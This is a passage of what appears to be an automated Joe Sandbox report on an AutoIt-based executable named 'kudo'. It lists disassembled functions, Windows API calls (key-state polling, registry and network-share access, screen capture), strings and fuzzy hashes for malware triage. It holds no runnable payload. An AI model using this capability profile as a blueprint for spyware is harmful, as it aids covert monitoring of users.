                                                        • Part of subcall function 00802344: GetAsyncKeyState.USER32(00000001), ref: 00802399
                                                        • Part of subcall function 00802344: GetAsyncKeyState.USER32(00000002), ref: 008023A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,00801256), ref: 008029FC
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: b9b0d22e7542785093ab5e284fbf1619ffa4cbd65014340a8849e62bd7fa2bcf
                                                      • Instruction ID: d08672f8948900efd2ba076a23b9a39050514dc9c53a7e60640e02e74ff54de7
                                                      • Opcode Fuzzy Hash: b9b0d22e7542785093ab5e284fbf1619ffa4cbd65014340a8849e62bd7fa2bcf
                                                      • Instruction Fuzzy Hash: 5BB14A75A0060AEFDB54DFA8DC49BAE7BB4FB48314F104229FA15E62E0DB74A850CB50
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 3576275495-1459072770
                                                      • Opcode ID: dd01ca15b16f0aa340a2db57e1fb66a9bd6e1cef61a702c14fa708124ffce637
                                                      • Instruction ID: 1e2636e551779627ba7d69f8f6ee9091ef460183acd70b83590449fd2274bd63
                                                      • Opcode Fuzzy Hash: dd01ca15b16f0aa340a2db57e1fb66a9bd6e1cef61a702c14fa708124ffce637
                                                      • Instruction Fuzzy Hash: 7E41F9715002247BE715BA78DC47EBF776CFF52710F000066FA05E6283EA74998197A6
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085A47A
                                                      • __swprintf.LIBCMT ref: 0085A51B
                                                      • _wcscmp.LIBCMT ref: 0085A52E
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0085A583
                                                      • _wcscmp.LIBCMT ref: 0085A5BF
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0085A5F6
                                                      • GetDlgCtrlID.USER32(?), ref: 0085A648
                                                      • GetWindowRect.USER32(?,?), ref: 0085A67E
                                                      • GetParent.USER32(?), ref: 0085A69C
                                                      • ScreenToClient.USER32(00000000), ref: 0085A6A3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085A71D
                                                      • _wcscmp.LIBCMT ref: 0085A731
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0085A757
                                                      • _wcscmp.LIBCMT ref: 0085A76B
                                                        • Part of subcall function 0082362C: _iswctype.LIBCMT ref: 00823634
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: adde86c6d6ec24c1ababc20156c01d1bc15ed8f6aac4ecd0f963ba575c8cfc7c
                                                      • Instruction ID: 5f59669db69890bfcb92bea9f6d9fb15813f8ae852bb8feb68a4d4efe0ddc1a6
                                                      • Opcode Fuzzy Hash: adde86c6d6ec24c1ababc20156c01d1bc15ed8f6aac4ecd0f963ba575c8cfc7c
                                                      • Instruction Fuzzy Hash: BBA1D371204206AFDB18DF64C8C4FAAB7E8FF58316F044629FD99D2191DB30E959CB92
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0085AF18
                                                      • _wcscmp.LIBCMT ref: 0085AF29
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0085AF51
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0085AF6E
                                                      • _wcscmp.LIBCMT ref: 0085AF8C
                                                      • _wcsstr.LIBCMT ref: 0085AF9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085AFD5
                                                      • _wcscmp.LIBCMT ref: 0085AFE5
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0085B00C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085B055
                                                      • _wcscmp.LIBCMT ref: 0085B065
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0085B08D
                                                      • GetWindowRect.USER32(00000004,?), ref: 0085B0F6
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00875013
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0087501E
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00875029
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00875034
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0087503F
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0087504A
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00875055
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00875060
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0087506B
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00875076
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00875081
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0087508C
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00875097
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 008750A2
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 008750AD
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 008750B8
                                                      • GetCursorInfo.USER32(?), ref: 008750C8
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      APIs
                                                      • _memset.LIBCMT ref: 0088A259
                                                      • DestroyWindow.USER32(?), ref: 0088A2D3
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0088A34D
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0088A36F
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A382
                                                      • DestroyWindow.USER32(00000000), ref: 0088A3A4
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0088A3DB
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A3F4
                                                      • GetDesktopWindow.USER32 ref: 0088A40D
                                                      • GetWindowRect.USER32(00000000), ref: 0088A414
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0088A42C
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0088A444
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00884424
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0088446F
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0088B8B4
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008891C2), ref: 0088B910
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088B949
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0088B98C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088B9C3
                                                      • FreeLibrary.KERNEL32(?), ref: 0088B9CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0088B9DF
                                                      • DestroyCursor.USER32(?), ref: 0088B9EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0088BA0B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0088BA17
                                                        • Part of subcall function 00822EFD: __wcsicmp_l.LIBCMT ref: 00822F86
                                                      Strings
                                                      Similarity
                                                      • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0086A3CB
                                                      • GetDriveTypeW.KERNEL32 ref: 0086A418
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A460
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A497
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A4C5
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      Strings
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0083E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0085F8DF
                                                      • LoadStringW.USER32(00000000,?,0083E029,00000001), ref: 0085F8E8
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • GetModuleHandleW.KERNEL32(00000000,008C5310,?,00000FFF,?,?,0083E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0085F90A
                                                      • LoadStringW.USER32(00000000,?,0083E029,00000001), ref: 0085F90D
                                                      • __swprintf.LIBCMT ref: 0085F95D
                                                      • __swprintf.LIBCMT ref: 0085F96E
                                                      • _wprintf.LIBCMT ref: 0085FA17
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0085FA2E
                                                      Strings
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0088BA56
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA6D
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA78
                                                      • CloseHandle.KERNEL32(00000000), ref: 0088BA85
                                                      • GlobalLock.KERNEL32(00000000), ref: 0088BA8E
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0088BA9D
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0088BAA6
                                                      • CloseHandle.KERNEL32(00000000), ref: 0088BAAD
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0088BABE
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00892CAC,?), ref: 0088BAD7
                                                      • GlobalFree.KERNEL32(00000000), ref: 0088BAE7
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0088BB0B
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0088BB36
                                                      • DeleteObject.GDI32(00000000), ref: 0088BB5E
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0088BB74
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: b03c89a5ac31746fe339aa1d7c9400a08140b55621943ce33c3a55c3f13962f2
                                                      • Instruction ID: 76f18a920ec3ede86582493f449f9745b5fa1ece70f10eb2ef2ab41ea6252e83
                                                      • Opcode Fuzzy Hash: b03c89a5ac31746fe339aa1d7c9400a08140b55621943ce33c3a55c3f13962f2
                                                      • Instruction Fuzzy Hash: 43411A75601208EFDB21AF69DC88EAB7BB8FF89721F104069FA09D7261D7309D01DB60
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0086DA10
                                                      • _wcscat.LIBCMT ref: 0086DA28
                                                      • _wcscat.LIBCMT ref: 0086DA3A
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086DA4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086DA63
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0086DA7B
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0086DA95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086DAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 090d0e94bcdd8f51654c487d7e30663e532a72071ee6fa8634644a685d5b4455
                                                      • Instruction ID: 6deaf191bbdbae7557c5144fa7e4df1b96fb0fd04530c9c62c5f08ac286d6926
                                                      • Opcode Fuzzy Hash: 090d0e94bcdd8f51654c487d7e30663e532a72071ee6fa8634644a685d5b4455
                                                      • Instruction Fuzzy Hash: 32818471A043459FCB64DF68C84596ABBE4FF89314F198C2EF889CB251D730D945CB52
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0087738F
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0087739B
                                                      • CreateCompatibleDC.GDI32(?), ref: 008773A7
                                                      • SelectObject.GDI32(00000000,?), ref: 008773B4
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00877408
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00877444
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00877468
                                                      • SelectObject.GDI32(00000006,?), ref: 00877470
                                                      • DeleteObject.GDI32(?), ref: 00877479
                                                      • DeleteDC.GDI32(00000006), ref: 00877480
                                                      • ReleaseDC.USER32(00000000,?), ref: 0087748B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 94f4ad18ebe1940f900a3c13a73b67fe0b23bff756948aab6adb37838cecf16c
                                                      • Instruction ID: 1b66339ff0af9e626e9adfe4608241ff4f7f6303a7260f8b5f5ae7a97cede2ea
                                                      • Opcode Fuzzy Hash: 94f4ad18ebe1940f900a3c13a73b67fe0b23bff756948aab6adb37838cecf16c
                                                      • Instruction Fuzzy Hash: AB513775904209EFCB14CFA8CC84EAEBBB9FF48310F148529FA5AE7211D731A940DB50
                                                      APIs
                                                        • Part of subcall function 00820957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00806B0C,?,00008000), ref: 00820973
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00806BAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00806CFA
                                                        • Part of subcall function 0080586D: _wcscpy.LIBCMT ref: 008058A5
                                                        • Part of subcall function 0082363D: _iswctype.LIBCMT ref: 00823645
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: 7a6e95dcb6a24ee417d78eec0c11be17664fcc991f65536250dcc913a5ffbdb3
                                                      • Instruction ID: 5358cb425c65f57371f7f9d6850981d5f28b056ece200ca7a89461125b9997f9
                                                      • Opcode Fuzzy Hash: 7a6e95dcb6a24ee417d78eec0c11be17664fcc991f65536250dcc913a5ffbdb3
                                                      • Instruction Fuzzy Hash: B10266301083419FC764EF28C8819AFBBE5FF99314F10492DF996D72A2EA319959CB53
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862D50
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00862DDD
                                                      • GetMenuItemCount.USER32(008C5890), ref: 00862E66
                                                      • DeleteMenu.USER32(008C5890,00000005,00000000), ref: 00862EF6
                                                      • DeleteMenu.USER32(008C5890,00000004,00000000), ref: 00862EFE
                                                      • DeleteMenu.USER32(008C5890,00000006,00000000), ref: 00862F06
                                                      • DeleteMenu.USER32(008C5890,00000003,00000000), ref: 00862F0E
                                                      • GetMenuItemCount.USER32(008C5890), ref: 00862F16
                                                      • SetMenuItemInfoW.USER32(008C5890,00000004,00000000,00000030), ref: 00862F4C
                                                      • GetCursorPos.USER32(?), ref: 00862F56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00862F5F
                                                      • TrackPopupMenuEx.USER32(008C5890,00000000,?,00000000,00000000,00000000), ref: 00862F72
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00862F7E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      • Opcode ID: c2f8660b3cb060c8ffb42f8c1c0d951d1c058d862f58abae45609fcda02ff160
                                                      • Instruction ID: 83175465bd051a60077821cd9e9b72ab3e7808f1003496dccc09f25d31d14e88
                                                      • Opcode Fuzzy Hash: c2f8660b3cb060c8ffb42f8c1c0d951d1c058d862f58abae45609fcda02ff160
                                                      • Instruction Fuzzy Hash: 55710970601A09BFEB219F58DC49FAABF64FF04364F110266F615EA1E2C7726C60D791
                                                      APIs
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • _memset.LIBCMT ref: 0085786B
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008578A0
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008578BC
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008578D8
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00857902
                                                      • CLSIDFromString.OLE32(?,?), ref: 0085792A
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00857935
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0085793A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
